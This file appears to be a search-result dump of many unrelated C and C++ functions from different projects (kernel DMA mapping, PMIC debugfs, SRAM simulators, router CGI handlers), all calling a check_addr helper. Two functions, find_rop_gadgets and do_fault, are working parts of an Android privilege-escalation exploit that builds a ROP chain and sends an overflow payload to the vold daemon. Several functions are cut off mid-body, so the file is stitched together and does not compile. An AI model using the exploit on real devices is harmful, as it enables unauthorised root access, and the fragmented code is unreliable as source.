static int find_rop_gadgets()
{
/*
* add sp, #108 -> b01b
* pop {r4, r5, r6, r7, pc} -> bdf0
*
* pop {r0, pc} -> bd01
*/
int fd;
char r[2], d[2];
int n = 2;
int bad = 0;
if((fd=open("/system/lib/libc.so", O_RDONLY)) == -1)
die("[-] open");
lseek(fd, 0x10000, SEEK_SET);
while(n == 2 && (stack_pivot == 0x41414141 || pop_r0 == 0x41414141)) {
n = read(fd, r, 2);
switch(r[0]) {
case '\x1b':
if(r[1] == '\xb0') {
n = read(fd, d, 2);
if(d[0] == '\xf0' && d[1] == '\xbd') {
stack_pivot = 0xafd00000 + lseek(fd, 0, SEEK_CUR) - 4 + 1;
if(check_addr(stack_pivot) == -1)
stack_pivot = 0x41414141;
}
}
break;
case '\x01':
if(r[1] == '\xbd') {
pop_r0 = 0xafd00000 + lseek(fd, 0, SEEK_CUR) - 2 + 1;
if(check_addr(pop_r0) == -1)
pop_r0 = 0x41414141;
}
break;
default:
break;
}
}
if (stack_pivot == 0x41414141) {
printf("[-] You need more minerals !\n");
bad = -1;
}
if (pop_r0 == 0x41414141) {
printf("[-] You need more vespene gas !\n");
bad = -1;
}
if(bad == -1)
exit(-1);
return 0;
}
static int marimba_debugfs_get(void *data, u64 *val)
{
struct adie_dbg_device *dbgdev = data;
int rc;
u8 reg;
struct marimba marimba_id;
mutex_lock(&dbgdev->dbg_mutex);
rc = check_addr(dbgdev->addr, __func__);
if (rc)
goto done;
marimba_id.mod_id = dbgdev->mod_id;
rc = marimba_read(&marimba_id, dbgdev->addr, ®, 1);
rc = (rc == 2) ? 0 : rc;
if (rc) {
pr_err("%s: FAIL marimba_read(0x%03X)=0x%02X: rc=%d\n",
__func__, dbgdev->addr, reg, rc);
goto done;
}
*val = reg;
done:
mutex_unlock(&dbgdev->dbg_mutex);
return rc;
}
static int data_get(void *data, u64 *val)
{
struct pm8901_dbg_device *dbgdev = data;
int rc;
u8 reg;
mutex_lock(&dbgdev->dbg_mutex);
rc = check_addr(dbgdev->addr, __func__);
if (rc)
goto done;
rc = pm8901_read(dbgdev->pm_chip, dbgdev->addr, ®, 1);
if (rc) {
pr_err("%s: FAIL pm8901_read(0x%03X)=0x%02X: rc=%d\n",
__func__, dbgdev->addr, reg, rc);
goto done;
}
*val = reg;
done:
mutex_unlock(&dbgdev->dbg_mutex);
return rc;
}
int atm_add_addr(struct atm_dev *dev,struct sockaddr_atmsvc *addr)
{
unsigned long flags;
struct atm_dev_addr **walk;
int error;
error = check_addr(addr);
if (error)
return error;
spin_lock_irqsave(&dev->lock, flags);
for (walk = &dev->local; *walk; walk = &(*walk)->next)
if (identical(&(*walk)->addr,addr)) {
spin_unlock_irqrestore(&dev->lock, flags);
return -EEXIST;
}
*walk = kmalloc(sizeof(struct atm_dev_addr), GFP_ATOMIC);
if (!*walk) {
spin_unlock_irqrestore(&dev->lock, flags);
return -ENOMEM;
}
(*walk)->addr = *addr;
(*walk)->next = NULL;
spin_unlock_irqrestore(&dev->lock, flags);
notify_sigd(dev);
return 0;
}
void connect_manager::init(const char* default_addr, const char* addr_list,
size_t count, int conn_timeout /* = 30 */, int rw_timeout /* = 30 */)
{
if (addr_list != NULL && *addr_list != 0)
set_service_list(addr_list, (int) count,
conn_timeout, rw_timeout);
// 创建缺省服务连接池对象,该对象一同放入总的连接池集群中
if (default_addr != NULL && *default_addr != 0)
{
logger("default_pool: %s", default_addr);
int max = check_addr(default_addr, default_addr_, count);
if (max < 0)
logger("no default connection set");
else
default_pool_ = &set(default_addr_.c_str(), max,
conn_timeout, rw_timeout);
}
else
logger("no default connection set");
// 必须保证至少有一个服务可用
if (pools_.empty())
logger_fatal("no connection available!");
}
void connect_manager::set_service_list(const char* addr_list, int count,
int conn_timeout, int rw_timeout)
{
if (addr_list == NULL || *addr_list == 0)
{
logger("addr_list null");
return;
}
// 创建连接池服务集群
char* buf = acl_mystrdup(addr_list);
char* addrs = acl_mystr_trim(buf);
ACL_ARGV* tokens = acl_argv_split(addrs, ";,");
ACL_ITER iter;
acl::string addr;
acl_foreach(iter, tokens)
{
const char* ptr = (const char*) iter.data;
int max = check_addr(ptr, addr, count);
if (max < 0)
{
logger_error("invalid server addr: %s", addr.c_str());
continue;
}
(void) set(addr.c_str(), max, conn_timeout, rw_timeout);
logger("add one service: %s, max connect: %d",
addr.c_str(), max);
}
acl_argv_free(tokens);
acl_myfree(buf);
}
// Reads to a line from DRAM and write to the SRAM array
bool sram_array::write(unsigned address, unsigned size){
std::cout << "DRAM->SRAM" << m_sram_type << " addr=" << address << " size=" << size << std::endl;
// Check line is valid
if(!check_addr(address))
return false;
unsigned index = (address / (m_bit_width/2) ) % m_n_lines;
// don't overwrite valid lines
if (m_lines[index].m_valid){
return false;
}
if (FAST) {
m_n_writes++;
m_lines[index].m_valid = true;
return true;
}
// Find first available port to read from
for(unsigned i=0; i<m_n_rw_ports; ++i) {
if(!m_ports[i].m_is_busy){ // If not already handling another request
std::cout << "SRAM" << m_sram_type << " writing on port " << i << std::endl;
m_ports[i].m_is_busy = true;
m_ports[i].m_is_read = false;
m_ports[i].m_cur_access_cycle = 0;
m_ports[i].m_op = NULL;
m_n_writes++;
m_lines[index].m_valid = true;
break;
}
}
return true;
}
//CPTR is the 68k address of what was installed
static CPTR installresource(UBYTE *resource,size_t_68k size){
if(!check_addr(curmemloc)){
currealaddr += 1;
curmemloc += 1;
avbytes -= 1;
}
CPTR installaddr = curmemloc;
memcpy(currealaddr,resource,size);
//padding to word boundry for memswap
if(!check_addr(size))size++;
memswap(currealaddr,size);
currealaddr += size;
curmemloc += size;
avbytes -= size;
return installaddr;
}
static int do_fault()
{
char buf[255];
int sock = -1, n = 0, i;
char s_stack_addr[5], s_stack_pivot_addr[5], s_pop_r0_addr[5], s_system[5], s_bsh_addr[5], s_heap_addr[5];
uint32_t bsh_addr;
char padding[128];
int32_t padding_sz = (jumpsz == 0 ? 0 : gadget_jumpsz - jumpsz);
memset(padding, 0, 128);
strcpy(padding, "LORDZZZZzzzz");
if(padding_sz > 0) {
memset(padding+12, 'Z', padding_sz);
printf("[*] Poping %d more zerglings\n", padding_sz);
}
else if(padding_sz < 0) {
memset(padding, 0, 128);
memset(padding, 'Z', 12+padding_sz);
}
if ((sock = socket_local_client("vold", ANDROID_SOCKET_NAMESPACE_RESERVED, SOCK_STREAM)) < 0)
die("[-] Error creating Nydus");
sprintf(s_stack_addr, "%c%c%c%c", stack_addr & 0xff, (stack_addr>>8)&0xff, (stack_addr>>16)&0xff, (stack_addr>>24)&0xff);
sprintf(s_stack_pivot_addr, "%c%c%c%c", stack_pivot & 0xff, (stack_pivot>>8)&0xff, (stack_pivot>>16)&0xff, (stack_pivot>>24)&0xff);
sprintf(s_pop_r0_addr, "%c%c%c%c", pop_r0 & 0xff, (pop_r0>>8)&0xff, (pop_r0>>16)&0xff, (pop_r0>>24)&0xff);
sprintf(s_system, "%c%c%c%c", system_ptr & 0xff, (system_ptr>>8)&0xff, (system_ptr>>16)&0xff, (system_ptr>>24)&0xff);
sprintf(s_heap_addr, "%c%c%c%c", heap_addr & 0xff, (heap_addr>>8)&0xff, (heap_addr>>16)&0xff, (heap_addr>>24)&0xff);
strcpy(buf, "ZERG");
strcat(buf, " ZZ ");
strcat(buf, s_stack_pivot_addr);
for(i=3; i < buffsz+1; i++)
strcat(buf, " ZZZZ");
strcat(buf, " ");
strcat(buf, s_heap_addr);
n = strlen(buf);
bsh_addr = stack_addr + n + 1 + 8 + 8 + 8 + padding_sz + 12 + 4;
if(check_addr(bsh_addr) == -1) {
printf("[-] Colossus, we're doomed!\n");
exit(-1);
}
sprintf(s_bsh_addr, "%c%c%c%c", bsh_addr & 0xff, (bsh_addr>>8)&0xff, (bsh_addr>>16)&0xff, (bsh_addr>>24)&0xff);
n += sprintf(buf+n+1, "%s%s OVER%s%s%s%sZZZZ%s%c", s_stack_addr, s_heap_addr, padding, s_pop_r0_addr, s_bsh_addr, s_system, bsh, 0);
printf("[*] Sending %d zerglings ...\n", n);
if ((n = write(sock, buf, n+1)) < 0)
die("[-] Nydus seems broken");
sleep(3);
close(sock);
return n;
}
static dma_addr_t
nommu_map_single(struct device *hwdev, void *ptr, size_t size,
int direction)
{
dma_addr_t bus = virt_to_bus(ptr);
if (!check_addr("map_single", hwdev, bus, size))
return bad_dma_address;
return bus;
}
tlm::tlm_response_status
Memory::write(ensitlm::addr_t a, ensitlm::data_t d)
{
if (!check_addr(a))
return tlm::TLM_ADDRESS_ERROR_RESPONSE;
data[a/sizeof(ensitlm::data_t)] = d;
std::cout << name() << " : ecriture a l'adresse [" << a;
std::cout << "] de la donnee [" << d << "]" << std::endl;
return tlm::TLM_OK_RESPONSE;
}
static dma_addr_t
nommu_map_single(struct device *hwdev, phys_addr_t paddr, size_t size,
int direction)
{
dma_addr_t bus = paddr;
WARN_ON(size == 0);
if (!check_addr("map_single", hwdev, bus, size))
return bad_dma_address;
flush_write_buffers();
return bus;
}
static dma_addr_t nommu_map_page(struct device *dev, struct page *page,
unsigned long offset, size_t size,
enum dma_data_direction dir,
struct dma_attrs *attrs)
{
dma_addr_t bus = page_to_phys(page) + offset;
WARN_ON(size == 0);
if (!check_addr("map_single", dev, bus, size))
return bad_dma_address;
flush_write_buffers();
return bus;
}
void wo_trace(char *url)
{
char cmd[256];
const char *addr;
addr = webcgi_get("addr");
if (!check_addr(addr, 64)) return;
killall("traceroute", SIGTERM);
web_puts("\ntracedata = '");
sprintf(cmd, "traceroute -I -m %u -w %u %s", atoi(webcgi_safeget("hops", "0")), atoi(webcgi_safeget("wait", "0")), addr);
web_pipecmd(cmd, WOF_JAVASCRIPT);
web_puts("';");
}
/* Map a set of buffers described by scatterlist in streaming
* mode for DMA. This is the scatter-gather version of the
* above pci_map_single interface. Here the scatter gather list
* elements are each tagged with the appropriate dma address
* and length. They are obtained via sg_dma_{address,length}(SG).
*
* NOTE: An implementation may be able to use a smaller number of
* DMA address/length pairs than there are SG table elements.
* (for example via virtual mapping capabilities)
* The routine returns the number of addr/length pairs actually
* used, at most nents.
*
* Device ownership issues as mentioned above for pci_map_single are
* the same here.
*/
static int nommu_map_sg(struct device *hwdev, struct scatterlist *sg,
int nents, int direction)
{
struct scatterlist *s;
int i;
WARN_ON(nents == 0 || sg[0].length == 0);
for_each_sg(sg, s, nents, i) {
BUG_ON(!sg_page(s));
s->dma_address = sg_phys(s);
if (!check_addr("map_sg", hwdev, s->dma_address, s->length))
return 0;
s->dma_length = s->length;
}
void wo_ping(char *url)
{
char cmd[256];
const char *addr;
addr = webcgi_get("addr");
if (!check_addr(addr, 64)) return;
killall("ping", SIGTERM);
web_puts("\npingdata = '");
sprintf(cmd, "ping -c %d -s %d %s", atoi(webcgi_safeget("count", "0")), atoi(webcgi_safeget("size", "0")), addr);
web_pipecmd(cmd, WOF_JAVASCRIPT);
web_puts("';");
}
static int addr_set(void *data, u64 val)
{
struct pm8901_dbg_device *dbgdev = data;
int rc;
rc = check_addr(val, __func__);
if (rc)
return rc;
mutex_lock(&dbgdev->dbg_mutex);
dbgdev->addr = val;
mutex_unlock(&dbgdev->dbg_mutex);
return 0;
}
/* Map a set of buffers described by scatterlist in streaming
* mode for DMA. This is the scatter-gather version of the
* above pci_map_single interface. Here the scatter gather list
* elements are each tagged with the appropriate dma address
* and length. They are obtained via sg_dma_{address,length}(SG).
*
* NOTE: An implementation may be able to use a smaller number of
* DMA address/length pairs than there are SG table elements.
* (for example via virtual mapping capabilities)
* The routine returns the number of addr/length pairs actually
* used, at most nents.
*
* Device ownership issues as mentioned above for pci_map_single are
* the same here.
*/
int nommu_map_sg(struct device *hwdev, struct scatterlist *sg,
int nents, int direction)
{
int i;
BUG_ON(direction == DMA_NONE);
for (i = 0; i < nents; i++ ) {
struct scatterlist *s = &sg[i];
BUG_ON(!s->page);
s->dma_address = virt_to_bus(page_address(s->page) +s->offset);
if (!check_addr("map_sg", hwdev, s->dma_address, s->length))
return 0;
s->dma_length = s->length;
}
return nents;
}
/*
* If we allocate a 2 MB superpage read-write at a 2 MB aligned address,
* - the call should succeed
* - return the address we wished for
* - the memory should be readable and writable
* If we deallocate it,
* - the call should succeed
* - make the memory inaccessible
*/
boolean_t
test_allocatefixed() {
int kr;
int ret;
mach_vm_address_t addr = FIXED_ADDRESS1;
mach_vm_size_t size = SUPERPAGE_SIZE;
kr = mach_vm_allocate(mach_task_self(), &addr, size, VM_FLAGS_SUPERPAGE_SIZE_2MB);
if (!(ret = check_kr(kr, "mach_vm_allocate"))) return ret;
if (!(ret = check_addr(addr, FIXED_ADDRESS1, "mach_vm_allocate"))) return ret;
if (!(ret = check_rw(addr, size))) return ret;
kr = mach_vm_deallocate(mach_task_self(), addr, size);
if (!(ret = check_kr(kr, "mach_vm_deallocate"))) return ret;
if (!(ret = check_nr(addr, size, NULL))) return ret;
return TRUE;
}
static int
loader_TAPE_check(const char *filename,
unsigned char *data,
long size)
{
/*
* standard kc tape image (128 bytes/block no checksum)
* This is somewhat tricky because we don't have a simple
* signature to check against. Instead we test some
* constraints that should detect most of the tape images.
*/
if (size > 128)
if ((data[16] >= 2) && (data[16] <= 0x0a))
return check_addr(data, size - 128);
return 0;
}
static int addr_get(void *data, u64 *val)
{
struct pm8901_dbg_device *dbgdev = data;
int rc;
mutex_lock(&dbgdev->dbg_mutex);
rc = check_addr(dbgdev->addr, __func__);
if (rc) {
mutex_unlock(&dbgdev->dbg_mutex);
return rc;
}
*val = dbgdev->addr;
mutex_unlock(&dbgdev->dbg_mutex);
return 0;
}
static int hexagon_map_sg(struct device *hwdev, struct scatterlist *sg,
int nents, enum dma_data_direction dir,
struct dma_attrs *attrs)
{
struct scatterlist *s;
int i;
WARN_ON(nents == 0 || sg[0].length == 0);
for_each_sg(sg, s, nents, i) {
s->dma_address = sg_phys(s);
if (!check_addr("map_sg", hwdev, s->dma_address, s->length))
return 0;
s->dma_length = s->length;
flush_dcache_range(PAGE_OFFSET + s->dma_address,
PAGE_OFFSET + s->dma_address + s->length);
}
// check if data is ready to be read this cycle
bool sram_array::available(pipe_op* op){
// Check line is valid
if(!check_addr(op->get_sram_addr(m_sram_type)))
return false;
unsigned index = (op->get_sram_addr(m_sram_type) / (m_bit_width/2) ) % m_n_lines;
if(!m_lines[index].m_valid)
return false;
if (FAST) {
return true;
}
// otherwise check if a port is open and enough cycles have passed
// FIXME implement this for non FAST mode
return true;
}
externC void
cyg_start( void)
{
int i;
int data1_sum;
CYG_TEST_INIT();
// For human inspection
diag_printf("INFO:<IRAM usage : %p -> %p\n", _hal_iram_section_start_vma, _hal_iram_section_end_vma);
diag_printf("INFO:<IRAM bss @ %p\n", _hal_iram_bss_section_start);
diag_printf("INFO:<RAM : %p -> %p\n", (void*)CYGMEM_REGION_ram, (void*)(CYGMEM_REGION_ram + CYGMEM_REGION_ram_SIZE));
diag_printf("INFO:<onchip_fn1 @ %p>\n", &onchip_fn1);
diag_printf("INFO:<onchip_fn2 @ %p>\n", &onchip_fn2);
diag_printf("INFO:<onchip_data1 @ %p>\n", &onchip_data1[0]);
// Make sure that IRAM is really separate from main memory.
if ((_hal_iram_section_start_vma >= (cyg_uint8*)CYGMEM_REGION_ram) &&
(_hal_iram_section_start_vma < (cyg_uint8*)(CYGMEM_REGION_ram + CYGMEM_REGION_ram_SIZE))) {
CYG_TEST_FAIL("IRAM start overlaps SDRAM");
}
if ((_hal_iram_section_end_vma >= (cyg_uint8*)CYGMEM_REGION_ram) &&
(_hal_iram_section_end_vma < (cyg_uint8*)(CYGMEM_REGION_ram + CYGMEM_REGION_ram_SIZE))) {
CYG_TEST_FAIL("IRAM end overlaps SDRAM");
}
// Make sure that various objects are correctly placed.
check_addr(&onchip_fn1);
check_addr(&onchip_fn2);
check_addr(&onchip_data1[0]);
check_addr(&onchip_data2);
// Not data3, we want that one to be garbage collected.
check_addr(&onchip_bss1);
check_addr(&onchip_bss2[0]);
// Check that on-chip data is correctly initialized.
CYG_TEST_CHECK( 42 == onchip_data2, "onchip_data2 should be the answer");
for (i = 0, data1_sum = 0; i < 8; i++) {
data1_sum += onchip_data1[i];
}
CYG_TEST_CHECK( 36 == data1_sum, "onchip data1 array should add up to 36");
// Make sure we can call code located in iram.
{
void (*onchip_fn1_ptr)(void) = &onchip_fn1;
(*onchip_fn1_ptr)();
}
CYG_TEST_PASS_FINISH("IRAM test");
}
int atm_del_addr(struct atm_dev *dev,struct sockaddr_atmsvc *addr)
{
struct atm_dev_addr **walk,*this;
int error;
error = check_addr(addr);
if (error) return error;
down(&local_lock);
for (walk = &dev->local; *walk; walk = &(*walk)->next)
if (identical(&(*walk)->addr,addr)) break;
if (!*walk) {
up(&local_lock);
return -ENOENT;
}
this = *walk;
*walk = this->next;
kfree(this);
up(&local_lock);
notify_sigd(dev);
return 0;
}
static int data_set(void *data, u64 val)
{
struct pm8058_dbg_device *dbgdev = data;
u8 reg = val;
int rc;
mutex_lock(&dbgdev->dbg_mutex);
rc = check_addr(dbgdev->addr, __func__);
if (rc)
goto done;
rc = pm8058_write(dbgdev->pm_chip, dbgdev->addr, ®, 1);
if (rc)
pr_err("%s: FAIL pm8058_write(0x%03X)=0x%02X: rc=%d\n",
__func__, dbgdev->addr, reg, rc);
done:
mutex_unlock(&dbgdev->dbg_mutex);
return rc;
}
bool sram_array::write(pipe_op *op){
std::cout << "Write (op) sent" << std::endl;
// Check line is valid
if(!check_addr(op->get_sram_addr(m_sram_type)))
return false;
unsigned index = (op->get_sram_addr(m_sram_type) / (m_bit_width/2) ) % m_n_lines;
// check if pipe_op is supposed to overwrite
bool overwrite = true; // FIXME, this should depend on op
if(!m_lines[index].m_valid && !overwrite)
return false;
// FIXME: need more logic here to differentiate between overwritting a partial sum and a result waiting to be stored
if (FAST) {
m_lines[index].m_valid = true;
m_n_writes++;
return true;
}
// Find first available port to read from
for(unsigned i=0; i<m_n_rw_ports; ++i) {
if(!m_ports[i].m_is_busy){ // If not already handling another request
std::cout << "SRAM" << m_sram_type << " writing on port " << i << std::endl;
m_ports[i].m_is_busy = true;
m_ports[i].m_is_read = false;
m_ports[i].m_cur_access_cycle = 0;
m_ports[i].m_op = op;
m_ports[i].m_op->set_sram_op_pending(m_sram_type); // Operation not completed yet
m_n_writes++;
break;
}
}
return true;
}
static int hexagon_map_sg(struct device *hwdev, struct scatterlist *sg,
int nents, enum dma_data_direction dir,
unsigned long attrs)
{
struct scatterlist *s;
int i;
WARN_ON(nents == 0 || sg[0].length == 0);
for_each_sg(sg, s, nents, i) {
s->dma_address = sg_phys(s);
if (!check_addr("map_sg", hwdev, s->dma_address, s->length))
return 0;
s->dma_length = s->length;
if (attrs & DMA_ATTR_SKIP_CPU_SYNC)
continue;
flush_dcache_range(dma_addr_to_virt(s->dma_address),
dma_addr_to_virt(s->dma_address + s->length));
}
int atm_del_addr(struct atm_dev *dev,struct sockaddr_atmsvc *addr)
{
unsigned long flags;
struct atm_dev_addr **walk,*this;
int error;
error = check_addr(addr);
if (error)
return error;
spin_lock_irqsave(&dev->lock, flags);
for (walk = &dev->local; *walk; walk = &(*walk)->next)
if (identical(&(*walk)->addr,addr)) break;
if (!*walk) {
spin_unlock_irqrestore(&dev->lock, flags);
return -ENOENT;
}
this = *walk;
*walk = this->next;
kfree(this);
spin_unlock_irqrestore(&dev->lock, flags);
notify_sigd(dev);
return 0;
}
// Reads a line from the SRAM array
bool sram_array::read(unsigned address, unsigned size){
std::cout << "SRAM" << m_sram_type << "->DRAM addr=" << address << " size=" << size << std::endl;
// Check line is valid
if(!check_addr(address))
return false;
// assuming that all addresses streams will be sequential
unsigned index = (address / (m_bit_width/2) ) % m_n_lines;
if(!m_lines[index].m_valid)
return false;
if (FAST) {
m_lines[index].m_valid = false;
m_n_reads++;
return true;
}
// Find first available port to read from
for(unsigned i=0; i<m_n_rw_ports; ++i) {
if( ! m_ports[i].m_is_busy ){ // If not already handling another request
std::cout << "SRAM" << m_sram_type << " reading on port " << i << std::endl;
m_ports[i].m_is_busy = true;
m_ports[i].m_is_read = true;
m_ports[i].m_cur_access_cycle = 0;
m_ports[i].m_op = NULL;
m_n_reads++;
break;
}
}
return true;
}